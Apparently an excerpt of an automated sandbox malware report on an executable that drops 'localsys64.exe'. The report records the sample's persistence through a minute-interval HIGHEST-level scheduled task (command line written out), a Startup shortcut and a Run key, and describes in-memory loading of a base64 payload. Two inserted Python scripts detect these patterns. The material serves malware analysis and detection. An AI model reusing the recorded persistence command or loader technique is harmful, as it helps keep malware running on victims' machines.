                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B957241 push eax; retf 7_2_00007FFD9B957242
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B952316 push 8B485F94h; iretd 7_2_00007FFD9B95231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D2A5 pushad ; iretd 11_2_00007FFD9B77D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B9691C9 pushad ; ret 11_2_00007FFD9B9693F1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B962316 push 8B485F93h; iretd 11_2_00007FFD9B96231B
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe File created: C:\Users\user\AppData\Roaming\localsys64.exe
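                  The .Net Code entries above are the client's plugin mechanism: a late-bound "Invoke" through NewLateBinding.LateCall, and AppDomain.Load(byte[]) fed with a payload that is base64-decoded and decompressed in memory, so the second-stage assembly never touches disk. The script below is an added triage example (not part of this report and not code from the sample) that scans the raw bytes of a .NET assembly for those indicators the way they actually appear in metadata: ECMA-335 keeps identifiers in the #Strings heap as NUL-terminated entries and user strings in the #US heap as length-prefixed UTF-16LE, so "AppDomain.Load" never occurs literally and the scan tests for co-occurring names instead. The indicator sets, the scoring rule and the two sample byte strings are constructed for this example.

```python
"""Static triage for the in-memory loading pattern listed above: late-bound
Invoke via NewLateBinding.LateCall and AppDomain.Load(byte[]) on a base64
decoded, decompressed blob. Added example; indicator sets, scoring rule and
the two sample byte strings are constructed here, not taken from the sample."""
import re

# Type and member names as they appear in a .NET assembly's #Strings heap,
# which stores each identifier as its own NUL-terminated entry. That is why
# "AppDomain.Load" never occurs literally and we test for co-occurrence.
INDICATOR_SETS = {
    "in-memory assembly load": {b"AppDomain", b"Load"},
    "VB late-bound invoke":    {b"NewLateBinding", b"LateCall"},
    "base64 payload decode":   {b"Convert", b"FromBase64String"},
    "payload decompression":   {b"Decompress"},
}

# A hit needs the loader plus at least one payload-handling set; "Load" and
# "Convert" on their own are far too common to act on. (Assumed rule.)
_REQUIRED = "in-memory assembly load"
_SUPPORTING = ("VB late-bound invoke", "base64 payload decode", "payload decompression")

_ASCII = re.compile(rb"[\x20-\x7e]{4,}")           # #Strings heap entries
_UTF16 = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # #US heap (UTF-16LE) entries

def extract_names(data: bytes) -> set[bytes]:
    """Printable ASCII runs plus UTF-16LE runs re-encoded as ASCII bytes.
    Each #US entry carries a length prefix and a trailing flag byte; this
    crude scan just skips over them because they are not printable."""
    names = set(_ASCII.findall(data))
    names |= {m.decode("utf-16-le").encode("ascii") for m in _UTF16.findall(data)}
    return names

def indicator_hits(data: bytes) -> dict[str, bool]:
    names = extract_names(data)
    return {label: required <= names for label, required in INDICATOR_SETS.items()}

def triage(data: bytes) -> tuple[bool, list[str]]:
    """Return (flagged, matched indicator labels)."""
    hits = indicator_hits(data)
    matched = [label for label, hit in hits.items() if hit]
    flagged = hits[_REQUIRED] and any(hits[s] for s in _SUPPORTING)
    return flagged, matched

# Constructed stand-ins for the relevant slice of a #Strings heap (NUL-separated
# identifiers) followed by one #US-style entry: length byte (12 chars + 1 flag
# byte = 0x0d), UTF-16LE text, flag byte. Not bytes from the real sample.
SUSPECT_HEAP = b"\x00".join([
    b"Messages", b"System", b"AppDomain", b"Load", b"Assembly",
    b"Microsoft.VisualBasic.CompilerServices", b"NewLateBinding", b"LateCall",
    b"Convert", b"FromBase64String", b"Helper", b"Decompress", b"Invoke",
]) + b"\x00" + bytes([2 * len("Plugin") + 1]) + "Plugin".encode("utf-16-le") + b"\x00"

BENIGN_HEAP = b"\x00".join(
    [b"Program", b"Main", b"System", b"Console", b"WriteLine", b"Load"]) + b"\x00"

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT_HEAP), ("benign", BENIGN_HEAP)):
        flagged, matched = triage(blob)
        print(f"{name}: {'FLAG' if flagged else 'ok'} {matched}")
```

                  Run it against a dumped assembly with `triage(open(path, "rb").read())`. Name co-occurrence is a screening heuristic only: a production check should resolve the TypeRef/MemberRef tables so that "Load" is tied to System.AppDomain rather than to any type that happens to have a Load member.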

                  Boot Survival

                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk (2 identical entries)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run localsys64 (2 identical entries)
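                  The Boot Survival entries are a persistence triple aimed at one file: a scheduled task that relaunches the dropped copy every minute at the highest run level, a .lnk in the user's Startup folder (its relative target ..\..\..\..\..\localsys64.exe, recorded earlier in this report, resolves from Startup back up to %APPDATA%), and an HKCU Run value. The script below is an added detection example, not code from this report or from the sandbox, that applies those observations to process-creation and autorun records such as Sysmon Event ID 1 command lines or Autoruns exports. The command-line tokenizer, the list of user-writable directories, the set of value-less schtasks switches and the two-reason threshold are this example's own assumptions.

```python
"""Persistence triage for the pattern recorded under Boot Survival:
schtasks.exe /create with a one-minute trigger and /RL HIGHEST, plus Run-key
and Startup-folder entries, all aimed at a user-writable path.
Added example; the rules below are assumptions, not sandbox logic."""
import ntpath
import re
from dataclasses import dataclass, field

# Directories an unprivileged user can write to. A task action or autorun that
# points here deserves more scrutiny than one under Program Files. (Assumed list.)
USER_WRITABLE = ("\\appdata\\roaming", "\\appdata\\local", "\\temp\\", "\\users\\public")

# Windows command-line tokenizer that keeps double-quoted arguments whole.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# schtasks switches that take no value (assumed subset of the real CLI).
_FLAG_SWITCHES = {"create", "delete", "query", "f", "z"}

def split_cmdline(cmdline: str) -> list[str]:
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

def parse_schtasks(cmdline: str) -> dict[str, object]:
    """Map /switch tokens to their values (keys lower-cased, slash removed)."""
    toks = split_cmdline(cmdline)
    opts: dict[str, object] = {}
    i = 0
    while i < len(toks):
        tok = toks[i]
        if not tok.startswith("/"):
            i += 1
            continue
        key = tok[1:].lower()
        if key in _FLAG_SWITCHES or i + 1 == len(toks) or toks[i + 1].startswith("/"):
            opts[key] = True
            i += 1
        else:
            opts[key] = toks[i + 1]
            i += 2
    return opts

def in_user_writable(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)

def resolve_startup_lnk(startup_dir: str, relative_target: str) -> str:
    """Resolve a relative .lnk target the way the shell does, from the Startup folder."""
    return ntpath.normpath(ntpath.join(startup_dir, relative_target))

@dataclass
class Verdict:
    suspicious: bool = False
    reasons: list[str] = field(default_factory=list)

def triage_schtasks(cmdline: str) -> Verdict:
    """Score a schtasks.exe command line; two or more reasons => suspicious."""
    opts = parse_schtasks(cmdline)
    v = Verdict()
    if not opts.get("create"):
        return v                          # only task creation is scored here
    action = str(opts.get("tr", ""))
    if in_user_writable(action):
        v.reasons.append(f"task action in user-writable path: {action}")
    if str(opts.get("sc", "")).lower() == "minute" and str(opts.get("mo", "")) == "1":
        v.reasons.append("trigger fires every minute (watchdog-style relaunch)")
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        v.reasons.append("/RL HIGHEST asks for the highest integrity level available")
    if opts.get("f"):
        v.reasons.append("/f silently replaces an existing task with the same name")
    v.suspicious = len(v.reasons) >= 2
    return v

def triage_autorun(location: str, target: str) -> Verdict:
    """Run-key values and Startup-folder .lnk targets: flag user-writable targets."""
    v = Verdict()
    if in_user_writable(target):
        v.reasons.append(f"{location} launches a binary from a user-writable directory: {target}")
        v.suspicious = True
    return v

# The command line and paths recorded in this report, used as sample input.
REPORTED_CMDLINE = ('"C:\\Windows\\System32\\schtasks.exe" /create /f /RL HIGHEST /sc minute '
                    '/mo 1 /tn "localsys64" /tr "C:\\Users\\user\\AppData\\Roaming\\localsys64.exe"')
STARTUP_DIR = "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
RUN_KEY = "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\localsys64"

if __name__ == "__main__":
    lnk_target = resolve_startup_lnk(STARTUP_DIR, "..\\..\\..\\..\\..\\localsys64.exe")
    for verdict in (triage_schtasks(REPORTED_CMDLINE),
                    triage_autorun("Startup .lnk", lnk_target),
                    triage_autorun(RUN_KEY, "C:\\Users\\user\\AppData\\Roaming\\localsys64.exe")):
        print("SUSPICIOUS" if verdict.suspicious else "ok", verdict.reasons)
```

                  The two-reason threshold keeps ordinary maintenance tasks quiet: a daily task under Program Files collects no reasons, while the recorded command line collects all four. Feed it the CommandLine field of Sysmon Event ID 1 records where Image ends in schtasks.exe, and the value data of Run keys and Startup .lnk targets for the autorun check.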

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (11 identical entries)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Process information set: NOOPENFILEERRORBOX (49 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (86 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
